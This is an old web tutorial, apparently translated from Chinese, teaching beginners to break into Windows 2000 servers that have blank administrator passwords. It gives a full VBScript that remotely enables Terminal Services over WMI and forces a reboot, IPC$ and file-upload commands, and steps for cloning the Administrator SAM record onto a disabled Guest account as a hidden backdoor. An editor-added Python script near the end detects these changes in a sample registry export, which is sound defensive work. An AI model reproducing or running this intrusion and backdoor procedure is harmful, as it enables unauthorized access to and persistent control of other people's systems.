Simple 3389 intrusion process | http://www.cshu.net





            Simple 3389 intrusion process
            www.cshu.net  2003-3-1  fog rain village 

              I've seen lots of articles online about "how to break in" and so on, and I
              think to a newbie they are basically unreadable! So I had an idea: write a
              short, simple piece that suits newbies! Learn along with me ~

              If you want to break in, I suggest you work from a Win2000 environment!

              First, to break in you need tools! I recommend a few programs to everyone,
              the ones I use all the time:
              Scanners: X-Scan V2.3, WINNTAutoAttack and Liuguang.
              I have hardly used X-Scan lately; basically I use WINNTAutoAttack, and of
              course Xiaorong's Liuguang is also one I use often.
              To open the terminal service remotely you need a script; the code is in
              the second post below. Save it as *.vbe (I save it as rots.vbe).
              For cloning the account, psu will do ~!
              OK, suppose the scan found a server with a weak NT password: the IP is
              120.0.0.1, the administrator account is administrator and the password is
              blank.
              Run CMD (the Win2000 DOS prompt) and open the terminal service on it!
              The command is as follows:
              cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
              You should be able to follow the command above: "cscript rots.vbe" is the
              command, after it comes the IP, then the administrator account, then the
              password. Because the administrator password on 120.0.0.1 is blank, a pair
              of double quotes stands for an empty password. After that comes the port;
              you can set the terminal port to whatever you like. /fr is the open option
              (force a reboot; I always use this; you can also use /r, which is a normal
              reboot).
              Because the terminal service only exists on Win2000 Server editions and
              above, Pro certainly won't work. The script checks the server's edition and,
              if it is Pro, prompts you to quit the setup!
              If everything went smoothly you will be able to connect to the terminal.
              We can ping it to see whether it has rebooted yet: ping 120.0.0.1 -t
              After setup, connect to the terminal with the connection tool! Now we clone
              an account, ha-ha, to make things easier later!
              Back to DOS! We set up an IPC connection:
              net use \\120.0.0.1\ipc$ "" /user:"administrator"
              You should be able to understand this command! Once it completes, we upload
              psu to the target machine's winnt\system32 directory:
              copy psu.exe \\120.0.0.1\admin$\system32
              After the upload finishes, start making the backdoor account on the zombie
              (the compromised box)! Log on to the zombie!
              Suppose the guest user is disabled; we will make the backdoor account out of
              guest!
              Run CMD on that server and enter at the command line:
              psu -p regedit -i PID
              Explanation: the PID at the end is the PID of the system process winlogon.
              Right-click the taskbar and open Task Manager! Look at the Processes tab,
              find the winlogon process; the value after it is winlogon's PID. Suppose it
              is 5458.
              Then the command is:
              psu -p regedit -i 5458
              This opens the registry editor directly, and you can read the local SAM
              information.
              Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
              Under it is the local user information! What we need to do is clone
              administrator privileges onto the disabled guest account!
              HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
              Look at the type of administrator: it is 1f4; then look at guest: it is 1f5.
              Good, now that you know the types, open
              HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
              On the right, double-click F, copy the jumble of characters inside, then open
              HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
              On the right, double-click F and paste in what you just copied!
              When that is done, export these two keys:
              HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
              and HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
              After exporting, delete those two keys! Then import them again! Close the
              registry editor.
              Open CMD and enter at the command line:
              net user guest password
              This sets a password for guest; "password" at the end is the password.
              Then enter
              net user guest /active:y
              This activates the guest account; then we disable it again:
              net user guest /active:n
              The three commands above must be run under DOS!
              OK, open Computer Management and look at the users: see, the guest account
              is still disabled ~! Ha ha, but it already has administrator privileges!
              Moreover it does not show up in the Administrators group, yet it can log on
              to the terminal, just like the administrator account!
              Log off and log on with guest!
              Typing all this has worn me out ~`! It really isn't easy! Ha-ha, I hope
              everyone can understand the above!
              If anything is still unclear, you can ask me; whatever I know I will
              certainly tell everyone!
              Because I am only a newbie myself, there may be things I don't know well,
              ha-ha ~`! If anything is wrong, I ask the experts to point it out ~!
              ----------------------------------------------------------------------
              Below is the script that opens the terminal service; save it as *.vbe
              On error resume next
              Set outstreem = wscript.stdout
              Set instreem = wscript.stdin
              ' If started under wscript.exe, relaunch under cscript so console I/O works
              If (lcase(right(wscript.fullname, 11)) = "wscript.exe") then
                  Set objShell = wscript.createObject("wscript.shell")
                  objShell.Run("cmd.exe /k cscript //nologo " & chr(34) & wscript.scriptfullname & chr(34))
                  wscript.quit
              End if
              If wscript.arguments.count < 3 then
                  usage()
                  wscript.echo "Not enough parameters."
                  wscript.quit
              End if
              ipaddress = wscript.arguments(0)
              username = wscript.arguments(1)
              password = wscript.arguments(2)
              If wscript.arguments.count > 3 then
                  port = wscript.arguments(3)
              Else
                  port = 3389
              End if
              ' Convert the argument string to a number before the range check
              If isnumeric(port) then port = clng(port)
              If not isnumeric(port) or port < 1 or port > 65000 then
                  wscript.echo "The number of port is error."
                  wscript.quit
              End if
              If wscript.arguments.count > 4 then
                  reboot = wscript.arguments(4)
              Else
                  reboot = ""
              End if
              usage()
              outstreem.write "Connecting " & ipaddress & "...."
              ' Connect to WMI on the target with the supplied credentials
              Set objlocator = createobject("wbemscripting.swbemlocator")
              Set objswbemservices = objlocator.connectserver(ipaddress, "root/cimv2", username, password)
              showerror(err.number)
              ' 23 = SeShutdownPrivilege, 18 = SeRemoteShutdownPrivilege (WMI privilege ids)
              objswbemservices.security_.privileges.add 23, true
              objswbemservices.security_.privileges.add 18, true
              outstreem.write "Checking OS type...."
              Set colinstoscaption = objswbemservices.execquery("select caption from win32_operatingsystem")
              For each objinstoscaption in colinstoscaption
                  If instr(objinstoscaption.caption, "Server") > 0 then
                      wscript.echo "OK!"
                  Else
                      wscript.echo "OS type is " & objinstoscaption.caption
                      outstreem.write "Do you want to cancel setup? [y/n] "
                      strcancel = instreem.readline
                      If lcase(strcancel) <> "n" then wscript.quit
                  End if
              Next
              outstreem.write "Writing into registry...."
              ' Use the StdRegProv WMI class to write the remote registry
              Set objinstreg = objlocator.connectserver(ipaddress, "root/default", username, password).get("stdregprov")
              HKLM = &h80000002
              HKU = &h80000003
              With objinstreg
                  .createkey HKLM, "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
                  .setdwordvalue HKLM, "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache", "Enabled", 0
                  .createkey HKLM, "SOFTWARE\Policies\Microsoft\Windows\Installer"
                  .setdwordvalue HKLM, "SOFTWARE\Policies\Microsoft\Windows\Installer", "EnableAdminTSRemote", 1
                  .setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Control\Terminal Server", "TSEnabled", 1
                  .setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Services\TermDD", "Start", 2
                  .setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Services\TermService", "Start", 2
                  .setstringvalue HKU, ".DEFAULT\Keyboard Layout\Toggle", "Hotkey", "1"
                  .setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", "PortNumber", port
              End with
              showerror(err.number)
              ' Reboot flags for Win32Shutdown: 2 = reboot, 6 = forced reboot
              rebt = lcase(reboot)
              flag = 0
              If rebt = "/r" or rebt = "-r" or rebt = "\r" then flag = 2
              If rebt = "/fr" or rebt = "-fr" or rebt = "\fr" then flag = 6
              If flag <> 0 then
                  outstreem.write "Now, reboot target...."
                  strwqlquery = "select * from win32_operatingsystem where primary='true'"
                  Set colinstances = objswbemservices.execquery(strwqlquery)
                  For each objinstance in colinstances
                      objinstance.win32shutdown(flag)
                  Next
                  showerror(err.number)
              Else
                  wscript.echo "You need to reboot target." & vbcrlf & "Then,"
              End if
              wscript.echo "You can logon terminal services on port " & port & " later. Good luck!"

              Function showerror(errornumber)
                  If errornumber Then
                      wscript.echo "Error 0x" & cstr(hex(errornumber)) & "."
                      If err.description <> "" then
                          wscript.echo "Error description: " & err.description & "."
                      End if
                      wscript.quit
                  Else
                      wscript.echo "OK!"
                  End if
              End function

              Function usage()
                  wscript.echo string(79, "*")
                  wscript.echo "ROTS v1.05"
                  wscript.echo "Remote Open Terminal services Script, by grass wise"
                  wscript.echo "Welcome to visite www.5458.net"
                  wscript.echo "Usage:"
                  wscript.echo "cscript " & wscript.scriptfullname & " targetIP username password [port] [/r|/fr]"
                  wscript.echo "port: Default number is 3389. "
                  wscript.echo "/r: Auto reboot target. "
                  wscript.echo "/fr: Auto force reboot target. "
                  wscript.echo string(79, "*") & vbcrlf
              End function
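              The following is an added example, written for this edited page by the editor; it is not part of the original article and not the ROTS or psu authors' code. It shows, from the defender's side, how to spot the two changes the walkthrough makes by reading an exported registry file (.reg) offline: the Terminal Services values that the script writes (TSEnabled, TermService Start, RDP-Tcp PortNumber), and the SAM "F" record copied from the Administrator key (000001F4) onto the Guest key (000001F5). The .reg parser handles only the dword, hex and string value forms used here, the sample export is constructed (not from a real host), and the check that each F record embeds its own RID assumes the RID is stored as a little-endian DWORD at offset 0x30 of F, which is how common SAM parsers read it.

```python
"""Offline check of a Windows registry export (.reg) for the changes made by
the walkthrough above: Terminal Services enabled via the registry, and the
Administrator SAM 'F' record cloned onto the Guest account."""
import re
import struct

# Constructed sample .reg export (not captured from a real machine).
# 000001F4 = Administrator (RID 500), 000001F5 = Guest (RID 501, F cloned
# from Administrator), 000003E9 = an ordinary user (RID 1001, untouched).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00001a0a

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  f4,01,00,00,00,00,00,00,10,02,00,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  f4,01,00,00,00,00,00,00,10,02,00,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  e9,03,00,00,00,00,00,00,15,02,00,00
"""

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
TERMSVC_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
RDP_KEY = TS_KEY + r"\WinStations\RDP-Tcp"
USERS_KEY = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
RID_OFFSET_IN_F = 0x30  # assumed location of the RID inside the F record


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: (kind, value)}}.
    Supports dword:, hex: (with backslash line continuation) and quoted strings."""
    joined, buf = [], ""
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if line.endswith("\\"):          # continuation: glue the next line on
            buf += line[:-1].strip()
            continue
        joined.append(buf + line)
        buf = ""
    keys, current = {}, None
    for line in joined:
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif "=" in line and current is not None:
            name, raw = line.split("=", 1)
            name = name.strip().strip('"')
            if raw.startswith("dword:"):
                keys[current][name] = ("dword", int(raw[6:], 16))
            elif raw.startswith("hex:"):
                keys[current][name] = ("hex", bytes.fromhex(raw[4:].replace(",", "")))
            else:
                keys[current][name] = ("sz", raw.strip('"'))
    return keys


def terminal_service_findings(keys):
    """Report the registry values the ROTS script sets to expose RDP."""
    findings = []
    if keys.get(TS_KEY, {}).get("TSEnabled", (None, 0))[1] == 1:
        findings.append("TSEnabled=1 (Terminal Services enabled)")
    if keys.get(TERMSVC_KEY, {}).get("Start", (None, None))[1] == 2:
        findings.append("TermService Start=2 (automatic start)")
    port = keys.get(RDP_KEY, {}).get("PortNumber", (None, 3389))[1]
    if port != 3389:
        findings.append(f"RDP-Tcp PortNumber changed to {port}")
    return findings


def sam_clone_findings(keys):
    """Flag user records whose F blob embeds a RID other than the key's own,
    and pairs of user keys whose F blobs are byte-identical (a copied F)."""
    records = {}
    for key, values in keys.items():
        if key.startswith(USERS_KEY + "\\") and "F" in values:
            rid_name = key.rsplit("\\", 1)[1]
            if re.fullmatch(r"[0-9A-Fa-f]{8}", rid_name):
                records[int(rid_name, 16)] = values["F"][1]
    findings = []
    for rid, f in records.items():
        if len(f) >= RID_OFFSET_IN_F + 4:
            embedded = struct.unpack_from("<I", f, RID_OFFSET_IN_F)[0]
            if embedded != rid:
                findings.append(f"RID {rid} F record embeds RID {embedded}")
    rids = sorted(records)
    for i, a in enumerate(rids):
        for b in rids[i + 1:]:
            if records[a] == records[b]:
                findings.append(f"RID {a} and RID {b} have identical F records")
    return findings


if __name__ == "__main__":
    parsed = parse_reg(SAMPLE_REG)
    for finding in terminal_service_findings(parsed) + sam_clone_findings(parsed):
        print(finding)
```

              Run against an export of the SAM and SYSTEM hives, the identical-F and wrong-embedded-RID checks catch the clone even though the account still shows as disabled and is absent from the Administrators group, which is exactly why the walkthrough's "net user guest /active:n" step hides it from a casual look at Computer Management.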


              Original author: China wants the net technology forum -- grass wise 
              Source: China wants the net technology forum -- grass wise 
              535 readers have read this article 
